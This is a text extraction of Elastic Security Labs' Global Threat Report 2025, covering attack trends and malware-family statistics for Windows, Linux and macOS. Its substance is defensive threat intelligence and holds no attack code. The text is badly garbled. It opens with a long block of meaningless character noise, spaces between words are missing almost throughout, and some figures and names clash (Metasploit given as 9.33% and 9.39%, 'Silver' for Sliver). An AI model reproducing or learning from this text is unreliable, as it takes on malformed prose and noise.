2025年全球威胁报告 GLOBAL THREAT REPORT 2025

r

ΛrxxQ

}crnn-]cvrt_"I]

vnxvyJOOOCJQQCJJCCJJJn+

}CQCJJCCCJJXv])fft

:';"I)+>i!1C(rcyJYCQCCCQQCzxI.

i,![-nrxt(/t/ftlcttt/rtc{[_<'

cttt/rt({[_<,!+/ff"1tv:icccvxrjfI";+/ji

icccvxrjf;+/ji·:>j/;:i>/i.cncQQOOOOOQJz<>

·+Ifjfjr)jrjt,-tr/n/]jxfnx/rjnvjvzncxI~1QOOOOOOOOOOOQ

j/jjxjjff/[-fjj:…ΛIjt+:jxnvftjvj[+jc1jc11j11cf/tjf.+CQQOQVQQc

<fjj<t-}f")-_{r/t[}t'Yyy_-OQtQJ}+lt!11)

ttjf{fJC[+:::1]!1--}}]}{{}c"(z:1+.'-

11,JXJQJCCz,yn(/f-I,:I;ttIjIC}]][[[[}}[{}][[{}}{1}}1I1

1ZXJYJJXzc!,I,1I}-_[-}{_][]f[}]}-[[[}}}{[[]};]-[]}}}}

VZJJJXJyynxjnyyn'l,rt++<+]-[~__[-[]-[]]]]-][[-+-+__{-+]--[[]-[[[[}

TABLE

OF

CONTENTS

01

02

03

04

05

06

07

02

03

07

37

42

48

49

.YQQn<--!""_jnc

[czcxxxc:<{~lt-f;:<八]xvo

'jxJ.fJJJ-i,<!!1<

{I1<ll-1!;il-i++:

Inrycyyt+}jn1>;+l"">Λ,i+]

.(VJQVOQnxy:CJX/i"}CIC1;<.l".l.i_"Coo(fx[xcooootVYCCOVVCJv]]1t+:-}(;l

Vnxx/cz/t;XQxznvnzyoconnvxo)x>](1):

I,t,CQrxoooyftfJOYCOJxnJooccxnnxQQQCnl-iincJyliQi)QXOXJvozovrxjxrooonJXXVQJxcvnnzJCOCJot+'>

)JC[z"1QYJ<{XXOZJorcorrjfJf/t0oo}(1rxcoQvcICn

{XCC]zt}YIOJ(ZQ1:YIfjQyxyooyxf:IlCC!Zxxxi:Qocrjttoi[Qxcx

c/zojQ-VjJcQJ>VQOCOQnifJJ0ocootoyfx;jjQooxzi1!-r1rcoQJXQ

X.QYCJf(cnoQo:CJVJjxoZQ1{}JOO1CQcfcxvcYJ,:-cccn)fnzooQ:

nz!000~C-oxo]ozoo1oocnJOJr[YQoc,r八":l)Q}xcn.IΛ>)1ccn/IXy·

irco(Coy}cyjQ+llrrc}oxnxΛXox:,八>,ll;<:,nQcrQf-jcoc

:/]QQYQoC)z-onvc;_cfcQnQOQvnxQQ:~"++_i;.'[XZOOQ

nrnQ.OQJ(00ctvz.}zonyccxx0o)!'I

'xjZQoyoCVQ]/n}}C,.Qv;'OCZQvQ1r_:!i

GLOBALTHREATREPORT2025

nx(0OQ,o0rQQQ1n.QQx!]QfxoozQc>!XJfQ:'}l

01INTRODUCTION

elasticsecuritylabs

GLOBALTHREATREPORT20252

Introduction

Theadversary’splaybookhasfundamentallychanged.Theeraofslow,methodicalintrusionhasbeenreplacedbyanewmodelofhigh-velocityattacksthatprioritizespeedandefficiency.Attackersarenowexploitingthetrustedtoolsandworkflowsofthemodernenterprise—cloud

accounts,developerplatforms,andbrowsers—makingtheiractionsharderthanevertodistinguishfromnormalactivity.

Theanswerishiddeninyourdata.Tospottoday’shigh-speedattacks,

youneedanin-depthunderstandingofyourenvironment.Thismeans

usingAI-drivenanalysistoconnectreal-timeeventstohistoricalpatterns,revealingthefullstoryofanattack.Onlywiththisdeep,machine-speedcontextcanyoumakethequick,confidentdecisionsneededtostopa

modernthreat.

Ourteamofresearchers,analysts,andengineersatElasticSecurityLabsbelievesthattheonlywaytosucceedisthroughanopen,community-

basedapproach—weallgetstrongerwhenwesharewhatwelearn.

Thisreportputsthatbeliefintopractice,sharinginsightsfromourglobalvisibilitytohelpyoubuildastronger,moreconfidentdefense.

02EXECUTIVESUMMARY

elasticsecurtyabsGLOBALTHREATREPORT20253

Executivesummary

Theageofpatient,stealthyattacksisgivingwaytoaneweraofhigh-velocity

threats.Ouryear-over-yearanalysisrevealsaclearstrategicshift:Adversaries

areretoolingforspeed,weaponizingAItogeneratenovelthreatsatscale,and

prioritizingimmediateexecutionoverprolongedstealth.Thisaccelerationforcesdefenderstoadapttoanattacklifecyclemeasuredinminutes,notmonths,whererapid,context-richdecisionsdrawnfrombothreal-timeandhistoricaldatahave

becomethekeytoeffectivedefense.

The2025ElasticGlobalThreatReportfromElasticSecurityLabsbreaksdownthisnewlandscape.Basedonouranalysisofglobalthreattelemetry,we’veidentifiedthekey

adversarybehaviorsanddefensiveinnovationsthatmattermost.Here’sapreviewofwhatyou’lllearn:

•AdversaryprioritiesonWindowshaveflippedinthelastyear.Thetactic

categoryofExecutionnowaccountsfor32.05%ofmaliciousbehavior—doublingitspreviousshareof~16%—andsurpassingDefenseEvasionasthetoptactic.Thisdisruptsathree-yeartrendandindicatesastrategicshifttowardimmediatepayloaddeploymentoverinitialstealth.

Whatthismeansforyou–>Attackersarenolongerwaitingtohide;theyarefocusedonrunningmaliciouscodeimmediatelyuponentry.Thismakesruntimememoryprotectionandinitialaccesspreventionmorecriticalthanever.

•Thecloudattacksurfaceishighlyconcentrated.Over60%ofallcloudsecurityeventsboildowntojustthreeadversarygoals:InitialAccess,Persistence,and

CredentialAccess.

Whatthismeansforyou–>Acrossallmajorcloudplatforms,thislaserfocusonidentity-basedattacksisaclearsignalthathardeningauthenticationflowsandmonitoringforanomalousprivilegedaccessarethemosteffectivewaystodefendyourcloudworkloads.

02EXECUTIVESUMMARY

elasticsecurtyabsGLOBALTHREATREPORT20254

•AdversariesareweaponizingAItolowerthebarriertoentryforcybercrime.Wesawa15.5%increaseinGenericthreats,atrendlikelyfueledbyadversariesusinglargelanguagemodels(LLMs)toquicklygeneratesimplebuteffectivemalicious

loadersandtools.

Whatthismeansforyou–>TheriseofAI-generatedthreatsdramatically

increasesthevolumeandvarietyofmalwareyouface.ThismeansrelyinglessonstaticsignaturesandmoreonbehavioralanalyticsandAI-drivendetectiontoautomaticallyidentifyandstopthefloodofnovelthreatsatscale.

•Thetheftofbrowsercredentialshasindustrialized.Ouranalysisofover150,000malwaresamplesrevealedthatmorethan1in8aredesignedtostealbrowser

data.Thisisn’tforisolateduse;thesecredentialsaretherawmaterialfuelingtheaccessbrokereconomy,providingasteadysupplyofkeysforotherattackerstocompromisecorporatecloudaccounts.

Whatthismeansforyou–>Thebrowserisaprimarybattlegroundforyour

organization’smostsensitivedata.Infostealershaveadaptedtobuilt-inbrowserprotections,whichmeanstraditionalidentitycontrolsarenolongerenough.

•Sourcecodeleakscreateuniquelypermanentrisks.Asourinternalinvestigationsshow,asingleaccidentalcommittoGitHub—fromAPIkeystoapassportphoto—becomespartofadistributed,immutablehistorythatisincrediblydifficulttofully

remediate,creatingdurableexposurefromamomentarylapse.

Whatthismeansforyou–>Continuousmonitoringmustextendbeyond

traditionalperimetersandintoyourdeveloperworkflowstosecuretheentiresupplychainecosystem.

Thesetrendsaredeeplyinterconnected.AnadversarycanuseAI-generatedmalwaretostealbrowsercredentials,whicharethenusedtogaininitialaccesstoacloud

account.Onceinside,theyimmediatelyfocusonexecutiontodeployransomwareorstealdata.Thisreportconnectsthedots,showinghowtheseTTPsformthemodernattackchainand,moreimportantly,howtobreakitatmultiplepoints.

Thethreatlandscapeiscomplex,butbyunderstandingmalwareandthreatbehaviorsandleveragingadvanceddefenses,organizationscansignificantlyimprovetheir

resilience.ElasticSecurityprovidesthenecessarycapabilitiesandsharedintelligencetonavigatethesechallengesandbuildamoresecuredigitalfuturethroughcollectiveeffortsandcontinuousadaptation.

02EXECUTIVESUMMARY

elasticsecurtyabsGLOBALTHREATREPORT20255

What’snewinthisreport

Broadervisibilityintocustomerdistribution:Forthefirsttimeinthisreport,Elasticisprovidingthefollowingsummaryofourenterprisecustomerdistributiontohelp

contextualizetrendsandcorrelations.Thisgraphicdepictsthe10mostprevalent

categoriesofenterprise,whichincludesawiderangeofservice-basedbusinesses,

financialservicesproviders,utilities,andpublicsectororganizations.Industrycontextmattersbecausethreatactorsdon’ttargeteveryverticalthesameway,anditis

importanttoseeriskthroughthelensofyour,andadjacent,industrysectors.Tyingthreatstoverticalrealitieshelpsprovideaclearviewofbusinessimpact.

Count

InvestmentManagement4.1%

Software4.5%OtherProfessionalServices6.2%

Telecommunications6.4%

Other15.7%

BusinessServices12.5%

Insurance3.9%

TechnologyConsultingServices

27.3%

Banking9.0%

CivilianAgencies10.4%

Comparisonwithhybridsources:Newthisyear,weprovidesubsectionsthroughout

theTrendsandcorrelationssectionthatdescribeourobservationsfromhybridpublic/privatesources:Eachvendorcollectsuniquetelemetryinthesensethatouruserand

customerpopulationsmaynotoverlapacrossregionsorindustries.Thiscomparisontohybridsourcesservesasatransparentwaytocommunicatethatourvisibilitymaynotequatetothebroaderglobalthreatlandscape.It’sawayofshowingyouthat

weunderstandthelimitsofourimperfectvisibility,whilealsohighlightinggloballyprevalentthreatsyoumighthaveencountered.

InsightintoElasticsecuritymachinelearningandAI:Withthisedition,we’realsoincludinginformationonElasticSecurityMachineLearningandAI,includingmodel

elasticsecuritylabs

GLOBALTHREATREPORT20256

performanceandupdates.Thesetechnologiesplayapivotalroleindefense-in-depth,oftenmitigatingthreatsbeforetheyhaveanopportunitytoimpactenterprises.

VisibilityintoElastic’sinternalthreatdata:AsElasticSecurity’scustomerzero,

Elastic’sinternalinformationsecurityteamprovidesvaluableperspectivesabout

thethreatsweencounterfromtheglobalthreatlandscape.Thecasestudiesthey

contributetothispublicationhighlightthatwehaveskininthegame,andwepracticewhatwepreach.

Sunsetsectionsfrompreviousreports:Finally,thiseditionofElastic’sGlobalThreatReportomitssomesectionsfromprioreditions(suchasforecastsandforecast

rebuttals)andfocusesonkeystatisticsderivedfromthetelemetrydataourusers

andcustomersopttosharewithus.Italsoprovidesinsightsintotheworkwe’redoingbothtogeneratetelemetryandprioritizenewdataorcapabilities.Earlierin2025,we

releasedacompanionreport,

TheStateofDetectionEngineeringatElastic

,whichtellsthisstoryinmuchmoredetail.Let’sseehowwe’rechangingtogether.

03TRENDSANDCORRELATIONS

elasticsecurtyabsGLOBALTHREATREPORT20257

Trendsandcorrelations

Thefollowingsubsectionsdescribethemajortools,tactics,and

procedures(TTPs)employedbythreatsthatwereidentifiedacross

ElastictelemetryfromJune2024toJuly2025.ElastictelemetryincludesdatageneratedbyElasticEndgame,ElasticEndpoint,andtheElastic

Securitysolution.1Insomecases,theElasticSecuritysolutioningesteddatafromthird-partysensorsandothertechnologies.

Malwaresignaturekeystatistics

Inthissection,ElasticSecurityLabsstudiesthedistributionandtrendsofmalware

familiesin2025acrossallourcustomers’platforms,comparingthesefindingswith

lastyear’sresultswhereapplicable.Thisstudyincludesallfileandmemorythreats

identifiedusingourYARArules,whichareasetofstringsorbytesignaturesthat

uniquelyidentifyaspecificthreatorfamily.Inlinewithouropensourcephilosophy,wecontinuetosharetheseruleson

Elastic’sProtectionsartifactsrepository

.

DistributionofmalwarebyoperatingsystemsinElastictelemetry

Windows89.97%

Thissectiongeneralizesthemalwaresignatureeventsobservedacross

Linux9.00%

macOS1.03%

supportedoperatingsystems,whichpresentlyincludesWindows,Linux,andmacOSendpoints.

1TheElasticSecuritysolutiontelemetryisgeneratedbyadiversepopulationofsensorsanddatasourcesthataretoonumeroustodescribeconcisely,includingsensorsnotdevelopedbyElastic.

03TRENDSANDCORRELATIONS

elasticsecurtyabsGLOBALTHREATREPORT20258

Windowssummary

Outofallsignature-relateddetections,89.97%wererecordedonWindows.This

prevalenceislargelyduetothedistributionofWindowsamongcustomerenvironmentsandanemphasisonWindows-basedresearchtocombatnovelandwidespread

malwarethreats.

The23.85%increaseindetectionscomparedtolastyearcanbeattributedtotheincreaseinElasticDefendWindows-basedadoption.

Linuxsummary

Inthisyear’sstudy,Linuxsystemsaccountedfor9%ofobservedsystems,anotable

decreasefromthepreviousyear.However,thisdoesnotsuggestthatLinuxisless

ofatarget.Givenitsprimaryuseinserverandapplicationhosting,intrusionsoften

involveadvancedtechniqueslikeexploitkitsandcustomrootkits,asElasticSecurity

Labsdetailedinits

PUMAKIT

researchearlierthisyear.Suchnoveltechniquesare

challengingtodetectwithYARAsignatures,buttheymaybesuccessfullyidentifiedbyouragentusingbehavioralandmachinelearning–basedmethods.

macOSsummary

macOSrepresentsthesmallestportionofourdataat1.03%,consistentwiththe

previousyear.Whilethispercentageislow,attributedtobothitsloweradoptionamongourcustomersandgenerallylowervolumeofmalwaretargetingtheplatform,itdoes

notimplythatmacOSisinherentlymoresecure.

ElasticSecurity’shighlevelofcoverageonthisplatformallowedus

touncoveran

advancedthreatattack

earlierthisyear,whichweattributetotheDemocraticPeople’sRepublicofKorea(DPRK).

Malwarecategoriesobservedacrossallsupportedoperatingsystems

Eachfileandmemorysignatureweidentifyiscategorizedintodistinctbut

subjectivelydefinedgroups.Thedistributionacrossthesecategoriesisoutlinedinthefollowingtable.

03TRENDSANDCORRELATIONS

elasticsecurtyabsGLOBALTHREATREPORT20259

Trojan64.49%

Generic23.53%

Cryptominer2.77%RemoteAdmin1.91%

Rootkit5.01%Other2.29%

Trojancategory

Inthisyear’sreport,Trojanscomprised64.49%ofallidentifiedmalware.Thesethreatstypicallymasqueradeaslegitimatesoftware,allowingmaliciousactorstoestablisha

footholdoncompromisedsystems,exfiltratesensitivedata,deployadditionalharmfulpayloads,andfurtherpenetratenetworkdefenses.

ElasticSecurityLabsmaintainsvigilanceagainstsuchthreats,documentinga

ClickFix

malwarecampaign

thatwasactivelyemployedtodelivertheseTrojanpayloadsearlierintheyear.

Genericcategory

Genericthreats,encompassingvarioussmalltoolsthatcouldn’tbecategorized

elsewhere,accountfor23.53%ofallthreats;thiscategorysawa15.5%increasefromlastyear.

Thisriseispossiblydrivenbytheeaseofcreatingsuchtools.Largelanguagemodels(LLMs)enableevenless-skilledadversariestoquicklygeneratereliable,simple

loaders.Additionally,aclimateofeconomicuncertaintyoftenspursanincreaseincybercrime,leadingtomorediverseandwidespreadthreatactivity.

Rootkitcategory

Rootkitshaveshownasignificantincrease,reaching5.01%inthisyear’sstudy.

Ourabilitytodetectthemhasgreatlyimproved,particularlyonLinux,wheremany

advancedthreatsleveragekernel-levelfeaturesforstealthandprivilegedfunctionalitytoestablishadeepfootholdoninfectedmachines.Weconductedanin-depthanalysisofaWindowsrootkitanditscapabilitieswerefertoas

ABYSSWORKER

,alsoknownasPOORTRYbyGoogleCloudMandiant,whichwasdetectedinthewildviaourtelemetry.

03TRENDSANDCORRELATIONS

elasticsecuritylabs

GLOBALTHREATREPORT202510

Cryptominercategory

Cryptominerscontinuetoposeathreat,accountingfor2.77%oftheshare.ThemajorityaredeployedtomineMonerocryptocurrency,primarilyutilizing

XMRIG

.

ThisprevalenceislikelyduetoMonero’sprivacyfeatures.Additionally,unauthorizedcryptominingonLinuxhasledtoanincreasedresearchemphasisonthesefamilies.

RemoteMonitoringandManagement(RMM)category

RemoteMonitoringandManagement(RMM)tools,suchas

TeamViewer

or

UltraVNC

,represent1.91%ofobservedinstances.Theselegitimate,free,orpaid“support”toolsareabusedbythreatactorstogainremoteaccesstoavictim’smachineoncethe

victimistrickedintoinstallingthem.

MalwarefamiliesbrokendownbyoperatingsysteminElastictelemetry

Thissectionprovidesthemostprevalentmalwarefamiliesidentifiedoneachoperatingsystem.Thedesignation“malwarefamily”isappliedtorelatedcodefamiliesthatsharesignificantdesignandimplementationsimilarities,butwhichmaybedrasticallydifferentintermsofpackagingoreventranslatedtoanotherdevelopmentlanguage.

Prioreditionsofthisreportcombineddatafromalloperatingsystems,whichinfluencedthereporteddistributionofthesemaliciouscodefamilies.Withthismoredetailedreporting,wehopetobetterrepresentthesedistributions.Foreachoperatingsystem,wehighlightthreatphenomenathatmightotherwisebeoverlookedandwhicharereflectedinendpointbehavioraltrends.

Windows-basedmalwarefamilies

Elastictelemetrycapturedawidevarietyofsignatureeventswithfew,ifany,truly

dominantcodefamilies.However,threegeneralphenomenastandout:theexplosionofinfostealers,reliableoff-the-shelffamilies,andmalwarefromopensources.

elasticsecurtyabsGLOBALTHREATREPORT202511

Windows.Trojan.Bumblebee

6.67%

Windows.Trojan.Asyncrat

8.07%

Windows.Trojan.Njrat

5.33%

Windows.Trojan.Gh0st

5.33%

Windows.Trojan.RedLineStealer

6.67%

Windows.Trojan.Guloader

5.33%

Windows.Trojan.Remcos

9.33%

Windows.Trojan.GhostPulse

12.2%

Windows.Trojan.Lumma

6.67%

Windows.Trojan.Stealc

5.33%

Infostealersandtheprevalenceofaccessbrokernetworks

GhostPulse

representsabout12%ofsignatureeventsandleveragesbuilt-inWindowsscriptinginterfacesandprocessinjectiontodeliverinfostealerssuchas

Lumma

(6.67%)and

Redline

(6.67%).Infostealersplayakeyroleincollectingcredentialsthatarepackagedandsoldbyaccessbrokers,whichcommoditizesinitialaccesswhile

frustratingattributionofinitialaccessattempts.

Off-the-shelfframeworks

RemCos

(9.33%)and

CobaltStrike

(~2%)weretwoofthemost-frequentlyidentifiedoff-the-shelfmalwarefamiliesseentargetingtheWindowsoperatingsystem.These

capabilitiesbenefitfrommaturedevelopmentteamsandhavebeenleveragedbroadlybythreatsofallkindstoachieveavarietyofobjectives.Whilewehaveobservedan

overallreductionofoff-the-shelfimplantsthisyear,weattributethattotherapidpopularityofothercodefamilies.

Opensources

Ayncrat

,

Havoc

,and

njRat

collectivelyrepresentabout13%ofsignatureevents.

Whatseparatesthesecodefamiliesfromthosedevelopedprivatelyisthattheseare

availablepubliclyonGitHub.Theavailabilityofsourcecodelowersthebarriertoentryforsomethreatgroupsandmayinspirefeaturesinclosedmalwaredevelopment

ecosystems.Importantly,thisalsoplaysapowerfulroleinenablingdefenderstoproducecountermeasuresfromthoseverysameopensources.

elasticsecurtyabsGLOBALTHREATREPORT202512

Linux-basedmalwarefamilies

Linuxtelemetryshowsaconsistentthreatlandscapedominatedbycommoditized

malware,cryptocurrencyminers,andlightweightcommand-and-control(C2)

frameworks.Adversariescontinuetorelyonwell-knowncodefamiliessuchasSliver,

Mythic,andMetasploit,oftendeployedafterinitialaccessviaremoteservicesor

public-facingapplications.Theseframeworksaretypicallyuseddirectlyfromtheshell,indicatingahands-onintrusionstyle.

Linux.Trojan.Dropper!

3.09%

Linux.Trojan.XZBackdoor

10.60%

Linux.Trojan.Pornoasset

6.13%

Linux.Trojan.Getshell

4.37%

Linux.Trojan.Gafgyt

6.45%

Multi.Trojan.Mythic

11.99%

Multi.Trojan.Silver

12.43%

Linux.Trojan.Generic

Linux.Trojan.Mettle

3.93%

Linux.Trojan.Metasploit

9.33%

16.77%

Persistentpatterns

Acommonattackmethodologyobservedalongsidesignatureeventdatabegins

withInitialAccess,followedbyrapidestablishmentofPersistence.Scheduledjob

mechanismssuchascronandsystemdweremostcommonlyabused,frequently

triggeringbehavioraldetections.Shellprofilemodification,XDGautostartdesktopentries,andudevruleswerealsoobserved.ElasticSecurityLabsresearcherRubenGroenewoudhasshared

in-depthresearchintoLinuxpersistence

.

Off-the-shelf,onthewire

Ifthecloudis“someoneelse’scomputer”,off-the-shelfcapabilitiesare“someone

else’smalware.”Threatsofmanykindschosematureandwell-builtframeworkslikeSliver(12.43%),Mythic(~12%),andMetasploit(9.39%)becausetheyreducethe

developmentburdenwhilecomplicatingattribution.

elasticsecurtyabsGLOBALTHREATREPORT202513

Cryptocurrencymining

OncepersistenceisestablishedonLinux,adversariescommonlydeploycryptominers,particularlyXMRIGvariants.Thesepayloadsareusuallypartofbroaderscriptsthat

enumeratekernelfeatures,removecompetitorsusingkillcommands,harden

attackerfilesviachattr+i,andattempttoevadedetectionbydisablingsystem

logging,firewallrules,andotherdefenses.Attackersfrequentlyreachouttoexternalservicestodeterminethehost’spublicIPandoftenutilizeBusyBoxforcompact

utilityexecution.Thiscommonattackpatternisalsoobservedintheoverallbehavioraltelemetry.

macOS-basedmalwarefamilies

MacOS.Trojan.Metasploit

MacOS.Cryptominer.Generic

MacOS.Infostealer.MdQueryTCCMacOS.Trojan.Adload

Macos.Infostealer.Wallets

Multi.Trojan.Sliver

MacOS.Cryptominer.Xmrig

Macos.Creddump.KeychainAccessMacOS.Trojan.Thiefquest

MacOS.Trojan.Getshell

Other

25.66%

17.70%

13.27%

10.62%

7.08%

5.31%

4.42%

3.54%

2.65%

2.65%

7.07%

Off-the-shelfmalware

AlthoughthelownumberofmacOSobservationsmakesthestudyofmalware

distributionontheplatforminherentlyskewed,weobservethatthemostwidespreadfamilyisMetasploit,with25.66%oftheshare.

Cryptominers

Genericallyidentifiedcryptominers(17.70%)andthewell-knownXMRigminer

(4.42%)collectivelyrepresentabout22%ofthemalwareweobservedonmacOS.LikeLinux,macOSappearstobeanattractivetargetforcryptocurrencymining.

Infosealers

Infostealersareadominantcategoryonallsupportedoperatingsystems,with

MdQueryTCC(13.27%)andWallets(7.08%)makingupabout20%oftotalmacOS

elasticsecurtyabsGLOBALTHREATREPORT202514

observations.Notably,thisdoesn’tcaptureindirectorscript-based

infostealers—bothofwhichplayedrolesinnoveldiscoveries,whicharebydefinitionminorityevents.

Endpointbehaviorkeystatistics

ElasticSecurityoperatesontheprinciplesofopenness,transparency,andcollaboration.Inlinewiththesevalues,Elasticsharesall

protectionsartifacts

usedinproduction,whichdetailtheendpoint

behaviorallogicdevelopedtoidentifyadversarytradecraftusing

Elastic.Thisreportleveragesglobaltelemetryfromthealertsand

integratedpreventioncapabilitiesderivedfromthisdetectionlogic.TotheextentthattacticsandtechniquesexistinMITREATT&CK